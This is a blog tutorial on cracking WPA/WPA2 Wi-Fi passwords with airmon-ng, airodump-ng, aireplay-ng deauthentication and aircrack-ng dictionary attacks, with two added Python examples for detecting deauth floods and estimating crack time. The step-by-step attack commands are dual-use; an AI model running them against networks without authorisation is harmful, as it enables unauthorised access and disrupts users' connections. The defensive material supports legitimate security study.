WPA/WPA2 WIFI Cracking

Jonty Bhardwaj
5 min read · Feb 5, 2021

Hello Reader, I am Jonty Bhardwaj, currently enrolled in the Master Certificate in Cyber Security HackerU program. This is my first blog and I want to share some of my learnings with you about common WPA/WPA2 attacks and how to crack any WPA or WPA2 Wi-Fi, assuming you have a dictionary that contains the passphrase needed to crack the WPA handshake.

Without any more delay, let's start the fun stuff and get our hands dirty. First of all you need to set up your Wi-Fi adapter and open a Kali terminal to verify whether the adapter is recognised, with the command

iwconfig

As we see here, our Wi-Fi adapter is set up and working fine. Now we first have to kill the running processes (network managers and supplicants) that could interfere with the attack, with the following command

airmon-ng check kill

After the pre-checks are over we can start the attack. First we have to put the Wi-Fi adapter in monitor mode with the command

airmon-ng start wlan0

As you can see, we are in monitor mode now and can observe the packets flowing on the Wi-Fi network. After getting the adapter into monitor mode, it is time to scan the surrounding area to see how many Wi-Fi networks are present, select our target and try to capture a WPA handshake on it. To start monitoring the network we will use the command

airodump-ng wlan0

where wlan0 is the monitor-mode interface we want to listen on (depending on your airmon-ng version the interface may have been renamed, typically to wlan0mon, so use the name airmon-ng reported).

After starting airodump-ng on the monitor interface, your screen should look like this, where:

  • BSSID is the MAC address of the access point.
  • PWR is the signal strength.
  • Beacons is the number of beacon (announcement) frames sent by the access point.
  • Data is the number of captured data packets.
  • #/s is the number of data packets per second, measured over the last 10 seconds.
  • MB is the maximum speed supported by the access point.
  • ENC is the encryption in use.
  • CIPHER is the cipher detected by the adapter.
  • AUTH is the authentication protocol in use.
  • ESSID is the name of the Wi-Fi network.

After understanding what every field means we can now go ahead with our attack. We need to pick one target among these networks to attack and crack. In this case our target is the first Wi-Fi network in the table, with ESSID FTTxJBNET9911155022.

We will now focus on this specific network and try to capture a WPA handshake, locking airodump-ng to the target's BSSID and channel and writing the capture to a file:

airodump-ng wlan0 --bssid 38:94:XX:XX:XX:XX -c 4 --write wifi.cap

As you see here, there are several clients connected to this Wi-Fi network, listed under STATION. To capture a WPA handshake we need a client to (re)connect to this network while we are listening, so that we can capture the four-way handshake frames and crack them. The problem is that we might have to wait a long time for someone new to connect or for an existing client to reconnect. Most of the time we don't have the liberty to waste that much time waiting, so we have to improvise.

Luckily for us there is a specific attack which solves this problem. It is known as a de-authentication (De-Auth) attack: the aim is to forcefully kick one of the devices connected to the network by sending spoofed de-authentication frames that appear to come from the original device, so the access point disconnects it. Management frames are not authenticated on WPA/WPA2 networks unless 802.11w (Protected Management Frames) is enabled, which is why the forged frames are accepted. The client, not knowing why it was disconnected, will try to reconnect, and during that reconnection we capture the WPA handshake.

aireplay-ng -0 1 -a 38:94:XX:XX:XX:XX -c 2C:FD:XX:XX:XX:XX wlan0

Where:

  • -0 selects the deauthentication attack
  • 1 is the number of De-Auth packets to send (you can send more if you wish); 0 means send them continuously
  • -a specifies the MAC address of the access point
  • -c specifies the MAC address of the client to deauthenticate
De-Auth Attack
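Because de-authentication frames are unauthenticated without 802.11w, defenders watch for bursts of them. The following is an added example, not code from the original post: a small Python parser that decodes raw 802.11 management frames (no radiotap header) and flags a BSSID that receives a burst of deauth/disassoc frames. The MAC addresses, threshold and sample frames are constructed test data.

```python
import struct
from collections import Counter, defaultdict

# 802.11 management-frame subtypes (frame type 0)
BEACON, DISASSOC, DEAUTH = 0x08, 0x0A, 0x0C
MGMT_HDR_LEN = 24  # FC(2) + duration(2) + addr1/2/3 (18) + seq-ctl(2)

def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)

def parse_mgmt_frame(frame):
    """Decode an 802.11 frame without radiotap header.
    Returns (subtype, addr1, addr2, addr3, reason) or None if not a management frame."""
    if len(frame) < MGMT_HDR_LEN:
        return None
    fc0 = frame[0]                      # first byte of the frame-control field
    if (fc0 >> 2) & 0x3 != 0:           # bits 2-3: frame type; 0 = management
        return None
    subtype = (fc0 >> 4) & 0xF          # bits 4-7: subtype
    reason = None
    if subtype in (DEAUTH, DISASSOC) and len(frame) >= MGMT_HDR_LEN + 2:
        reason = struct.unpack("<H", frame[MGMT_HDR_LEN:MGMT_HDR_LEN + 2])[0]
    return (subtype, mac_str(frame[4:10]), mac_str(frame[10:16]),
            mac_str(frame[16:22]), reason)

def build_mgmt_frame(subtype, dst, src, bssid, reason=None):
    """Build a minimal management frame; used here only to construct sample input."""
    fc = bytes([subtype << 4, 0x00])    # version 0, type 0, no flags
    frame = fc + b"\x00\x00" + dst + src + bssid + b"\x00\x00"
    return frame + (struct.pack("<H", reason) if reason is not None else b"")

def detect_deauth_flood(frames, threshold=5):
    """Return {bssid: (count, [targeted stations])} for BSSIDs whose deauth/disassoc
    count reaches the threshold. A real sensor also keys on a time window; enabling
    802.11w (PMF) is the mitigation that makes forged frames fail integrity checks."""
    counts, targets = Counter(), defaultdict(set)
    for frame in frames:
        parsed = parse_mgmt_frame(frame)
        if parsed is None or parsed[0] not in (DEAUTH, DISASSOC):
            continue
        _, dst, _src, bssid, _reason = parsed
        counts[bssid] += 1
        targets[bssid].add(dst)
    return {b: (n, sorted(targets[b])) for b, n in counts.items() if n >= threshold}

# Constructed sample: locally administered MACs, 8 deauths from the AP to one
# station (reason 7, "class 3 frame received from nonassociated STA") plus a beacon.
AP = bytes.fromhex("020000000001")
STA = bytes.fromhex("020000000002")
SAMPLE_FRAMES = [build_mgmt_frame(DEAUTH, STA, AP, AP, 7) for _ in range(8)]
SAMPLE_FRAMES.append(build_mgmt_frame(BEACON, b"\xff" * 6, AP, AP))

if __name__ == "__main__":
    print(detect_deauth_flood(SAMPLE_FRAMES))
```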

As soon as we do this the client will try to reconnect, and we will see a WPA handshake being captured into the file written by airodump-ng (wifi.cap-01.cap).

As you can see in the top right corner of the image, airodump-ng reports that the WPA handshake has been captured. Now we stop the capture with Ctrl+C and check the file we created with the prefix wifi.cap.

Now we can use the capture file to crack the WPA handshake and recover the password. To crack the handshake we will use another utility, aircrack-ng, with the command

aircrack-ng wifi.cap-01.cap -w wordlist.txt

where:

  • -w wordlist.txt is the wordlist you want to use to crack the handshake.
  • wifi.cap-01.cap is the capture file containing the handshake.

The dictionary attack will succeed only if the actual passphrase is in the wordlist you supplied, and the time it takes depends on the size of the wordlist and the complexity of the key. Now you just have to wait and watch.
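Why the password must be in the wordlist, and why the time grows with key complexity: WPA/WPA2-PSK derives the 256-bit PMK from the passphrase and SSID with PBKDF2-HMAC-SHA1 at 4096 iterations, and a cracker repeats exactly that derivation for every candidate. The following is an added example (not from the original post or the aircrack-ng project) that computes the PMK, checks a constructed target against a constructed wordlist, and estimates worst-case search time for random passphrases at an assumed guess rate; the SSIDs, passphrases and rate are assumptions, except the IEEE 802.11 test vector ("password" / "IEEE").

```python
import hashlib

PBKDF2_ITERATIONS = 4096   # fixed by the WPA/WPA2-PSK specification
PMK_LEN = 32               # 256-bit Pairwise Master Key

def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    The SSID is the salt, so a PMK precomputed for one network name is useless
    against another name."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN)

def dictionary_check(target_pmk: bytes, ssid: str, wordlist):
    """Return the candidate whose PMK equals target_pmk, or None if absent.
    aircrack-ng additionally verifies the handshake MIC per candidate, but the
    per-guess cost is dominated by this PBKDF2 step either way."""
    for candidate in wordlist:
        candidate = candidate.strip()
        # WPA passphrases are 8 to 63 characters; anything else cannot be the key.
        if 8 <= len(candidate) <= 63 and derive_pmk(candidate, ssid) == target_pmk:
            return candidate
    return None

def worst_case_seconds(alphabet_size: int, length: int, guesses_per_second: float) -> float:
    """Seconds to exhaust every passphrase of the given length at the given rate."""
    return alphabet_size ** length / guesses_per_second

# Constructed data: made-up SSID, passphrase and a tiny wordlist (assumptions).
SSID = "ExampleNet"
TARGET_PMK = derive_pmk("winter2021", SSID)   # stands in for the captured handshake
WORDLIST = ["password", "12345678", "winter2021", "letmein1"]

if __name__ == "__main__":
    print("match:", dictionary_check(TARGET_PMK, SSID, WORDLIST))
    # Assumed rate of 100k guesses/s; adjust for your hardware.
    for n in (8, 12, 16):
        years = worst_case_seconds(62, n, 1e5) / (365 * 86400)
        print(f"{n} random alphanumerics: {years:.3g} years worst case")
```

The jump between 8 and 16 random characters is what separates "wait and watch" from "never", which is why a long random passphrase (and 802.11w) is the defence against the capture-and-crack workflow shown in this post.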

Key Cracked

Congrats!! You have successfully cracked your Wi-Fi Password. Hope this blog helped you in successfully cracking your Wi-Fi password.

Thank you for reading this blog. Happy Hacking!!
